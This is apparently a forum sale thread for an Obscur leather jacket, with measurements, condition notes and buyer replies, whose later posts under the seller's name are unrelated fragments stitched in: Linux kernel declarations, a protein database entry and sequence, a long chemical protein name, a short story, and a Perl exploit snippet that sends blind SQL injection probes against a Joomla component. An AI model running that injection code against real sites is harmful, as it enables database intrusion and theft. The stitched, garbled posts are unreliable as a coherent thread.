Obscur Leather Jacket (M)

[jcotteri]

Obscur in conjunction with NVREND

Brand new & Fits like a slim 48

more pictures soon...

Shoulders: 44 cm

Trunk: 46-47 cm (taken 2 inches under the armpit seams)

Front Length: 69 cm (from the top of the shoulder seam to the bottom of the scalloped hem)

SOLD

Item will be shipped from Eastern Australia

Paypal confirmed address only

Australians contact me for a feeless transaction

Price in USD and includes international shipping

NB: The way the leather sits makes it difficult to measure, therefore these are all approximate. Also the leather comes with a small scar on the rear, a couple of stitches have come undone under the arm and some light white marks which are left over from the washing process and will just rub off. This is the way the leather came and should be treated as natural effects. The jacket has only been worn once inside my room to judge the fit before I have decided to sell it

Fit pic here

[Guest dave 3000]

seems everyone is unhappy with the fit of their obscur jackets

.

[jcotteri]

not the fit as such just the size It's a touch to small for me

[jojojohn]

I'm waiting for the measurements ^^

[jcotteri]

added some more details

[jcotteri]

still on the market

[hommedeguerre]

PM me with more pics.

a.s.

[RaymondChiu]

hey jesse

pm me with measurements

r.c

[ryanvogue]

Measurements are below the photo.

[jcotteri]

lulz

10 char

[jcotteri]

/* dir stuff */

/* Inode stuff */

int adfs_get_block(struct inode *inode, sector_t block,

struct buffer_head *bh, int create);

struct inode *adfs_iget(struct super_block *sb, struct object_info *obj);

void adfs_read_inode(struct inode *inode);

[jcotteri]

RecName: Full=Pituitary homeobox 2; AltName: Full=Paired-like homeodomain transcription factor 2; AltName: Full=Homeobox protein PITX2; AltName: Full=Orthodenticle-like homeobox 2; AltName: Full=Solurshin; AltName: Full=ALL1-responsive protein ARP1; AltNa

METNCRKLVSACVQLGVQPAAVECLFSKDSEIKKVEFTDSPKSRKESASSKLFPRQHPGANEKDKGQQGKNEDVGAEDPSKKKRQRRQRTHFTSQQLQELEATFQRNRYPDMSTREEIAVWTNLTEARVRVWFKNRRAKWRKRERNQQAELCKNGFGPQFNGLMQPYDDMYPGYSYNNWAAKGLTSASLSTKSFPFFNSMNVNPLSSQSMFSPPNSISSMSMSSSMVPSAVTGVPGSSLNSLNNLNNLSSPSLNSAVPTPACPYAPPTPPYVYRDTCNSSLASLRLKAKQHSSFGYASVQNPASNLSACQYAVDRPV

[jcotteri]

$host = $target . "+and+1=1&option=com_mytube&Itemid=null";

my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;

if ($content =~ /$regexp/) {

$host = $target . "+and+1=2&option=com_mytube&Itemid=null";

my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;

if ($content =~ /$regexp/) {print " [-] Exploit Fallo :'''(\n";}

[jcotteri]

methionylglutaminylarginyltyrosylglutamylserylleucyl phenylalanylalanylglutaminylleucyllysylglutamylarginyl lysylglutamylglycylalanylphenylalanylvalylprolylphenylalanylvalylthreonylleucylglycylaspartylprolylglycylisol eucylglutamylglutaminylserylleucyllysylisoleucylaspartylthreonylleucylisoleucylglutamylalanylglycylalanylaspartyl alanylleucylglutamylleucylglycylisoleucylprolylphenylalanylserylaspartylprolylleucylalanylaspartylglycylprolyl threonylisoleucylglutaminylasparaginylalanylthreonylleucylarginylalanylphenylalanylalanylalanylglycylvalylthreonyl prolylalanylglutaminylcysteinylphenylalanylglutamylmethionylleucylalanylleucylisoleucylarginylglutaminyllysyl histidylprolylthreonylisoleucylprolylisoleucylglycylleucylleucylmethionyltyrosylalanylasparaginylleucylvalylphenyl alanylasparaginyllysylglycylisoleucylaspartylglutamylphenylalanyltyrosylalanylglutaminylcysteinylglutamyllysylvalyl glycylvalylaspartylserylvalylleucylvalylalanylaspartylvalylprolylvalylglutaminylglutamylserylalanylprolylphenylalanyl arginylglutaminylalanylalanylleucylarginylhistidylasparaginylvalylalanylprolylisoleucylphenylalanylisoleucylcysteinyl prolylprolylaspartylalanylaspartylaspartylaspartylleucylleucylarginylglutaminylisoleucylalanylseryltyrosylglycyl arginylglycyltyrosylthreonyltyrosylleucylleucylserylarginylalanylglycylvalylthreonylglycylalanylglutamylasparaginyl arginylalanylalanylleucylprolylleucylasparaginylhistidylleucylvalylalanyllysylleucyllysylglutamyltyrosylasparaginyl alanylalanylprolylprolylleucylglutaminylglycylphenylalanylglycylisoleucylserylalanylprolylaspartylglutaminylvalyllysyl alanylalanylisoleucylaspartylalanylglycylalanylalanylglycylalanylisoleucylserylglycylserylalanylisoleucylvalyllysylisol eucylisoleucylglutamylglutaminylhistidylasparaginylisoleucylglutamylprolylglutamyllysylmethionylleucylalanylalanylleucyl lysylvalylphenylalanylvalylglutaminylprolylmethionyllysylalanylalanylthreonylarginylserine

[jcotteri]

"I have a story to tell. Once there was a boy who had a large dog; the dog was called Xentrix. One day the boy was walking in the woods with Xentrix; he stumbled on a wooden door. Xentrix opened the door, and the boy followed him inside. What the boy saw amazed him: there was a cave one mile long, and inside the cave were one million other children and a million dogs. The boy could not hold back his tears when he heard Xentrix say, Welcome my friend. These are my people; now they are your people too."